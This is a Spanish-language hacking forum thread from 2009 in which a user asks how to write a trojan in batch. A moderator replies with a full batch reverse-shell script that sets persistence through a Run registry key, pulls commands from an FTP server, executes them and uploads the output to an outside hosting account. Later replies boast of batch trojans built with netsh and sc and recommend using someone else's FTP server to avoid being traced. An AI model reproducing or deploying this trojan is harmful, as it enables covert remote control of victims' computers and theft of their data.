elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  como puedo hacer un troyano en batch
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: como puedo hacer un troyano en batch  (Leído 9,786 veces)
blha

Desconectado Desconectado

Mensajes: 79


aprendiendo : c++, pyton, pearl, delphi.


Ver Perfil
como puedo hacer un troyano en batch
« en: 10 Mayo 2009, 19:51 pm »

ola a todos, bueno vi que hace cosa de 3 años hicieron un troyano programado en batch y bueno me han dado ganas de hacer uno yo. y mi pregunta es como lo haria, es decir como se comunicarian los dos pcs.

saludos


En línea

Black Hawk
usuario oculto


Desconectado Desconectado

Mensajes: 450



Ver Perfil WWW
Re: como puedo hacer un troyano en batch
« Respuesta #1 en: 10 Mayo 2009, 20:13 pm »

que era todo por ftp..?


En línea

Que le jodan a  la salud mental!
Fecha de registro:    16 Noviembre 2008, 17:38
años atrás users baneados :)
blha

Desconectado Desconectado

Mensajes: 79


aprendiendo : c++, pyton, pearl, delphi.


Ver Perfil
Re: como puedo hacer un troyano en batch
« Respuesta #2 en: 10 Mayo 2009, 20:19 pm »

si creo
En línea

Black Hawk
invisible_hack


Desconectado Desconectado

Mensajes: 978


Invisible_Hack™ Nick Registrado ^^


Ver Perfil WWW
Re: como puedo hacer un troyano en batch
« Respuesta #3 en: 10 Mayo 2009, 20:28 pm »

Así es, usaba el comando FTP para conectarse, pero creo recordar que Hendrix (el autor) dijo que tenia algunos fallitos, pero que sabiendo un poco del tema podian arreglarse...

En línea

"Si no visitas mi blog, Chuck te dará una patada giratoria"
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: como puedo hacer un troyano en batch
« Respuesta #4 en: 10 Mayo 2009, 22:35 pm »

en el BHC hay un ejemplo de conexión inversa por ftp, también debe estar en "jugando con netcat" en el foro de hacking basico que puse hace bastantes años.

Código
  1. ::--- ReverseShell-FTP 1.4 by WHK ---
  2. if not exist shellFTP.bat goto 2
  3. copy shellFTP.bat "%homepath%\fdb.bat"
  4. reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "fdb.bat"/t REG_SZ /d "at %homepath%\fdb.bat" /f
  5. :2
  6. set ip=127.0.0.1
  7. echo o > command
  8. echo %ip% >> command
  9. echo quit >> command
  10. echo quit >> command
  11.  
  12. echo o > ftp.dat
  13. echo 512.iespana.es >> ftp.dat
  14. echo user >> ftp.dat
  15. echo pass >> ftp.dat
  16. echo put verbose.txt >> ftp.dat
  17. echo quit >> ftp.dat
  18. echo quit >> ftp.dat
  19.  
  20. :1
  21. ftp -s:command > comandos.txt
  22. for /f %%i in (comandos.txt) do CMD /c %%i > verbose.txt
  23. ftp -s:ftp.dat
  24. ping -n 30 127.0.0.1
  25. goto 1
  26. ::----------------------------------------

De todas formas esto no es un fallo, solamente obtiene los comandos generados por la salida del ftp y los procesa en un bat y la respuesta de la ejecución la manda por ftp a un hosting propio.

PD: este post debería ir en "Scripting"
En línea

dmx-anonimo

Desconectado Desconectado

Mensajes: 32



Ver Perfil
Re: como puedo hacer un troyano en batch
« Respuesta #5 en: 20 Diciembre 2009, 13:31 pm »

con batch podes hacer de todo para lo que dicen que es limitado jaj imitado si uno quiere que los sea yo he hecho varios troyanos en batch
usando comandos como netsh , sc y redirectores s pueden ahcer de todo
yo que le recomiendo es que usen un ftp ajenos no lo hagnde su casa
consejo saludos......aproposito yo hice uno que inicia un servicio atraves de windwos intallers mas php jaj y funciona de lujo xd
En línea

joder .......xd
CaronteGold


Desconectado Desconectado

Mensajes: 339



Ver Perfil
Re: como puedo hacer un troyano en batch
« Respuesta #6 en: 21 Diciembre 2009, 01:32 am »



   Yo hice algo parecido, usando el ftp, mira aquí:


http://foro.elhacker.net/scripting/mini_troyano_por_ftp_batch-t265677.0.html
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines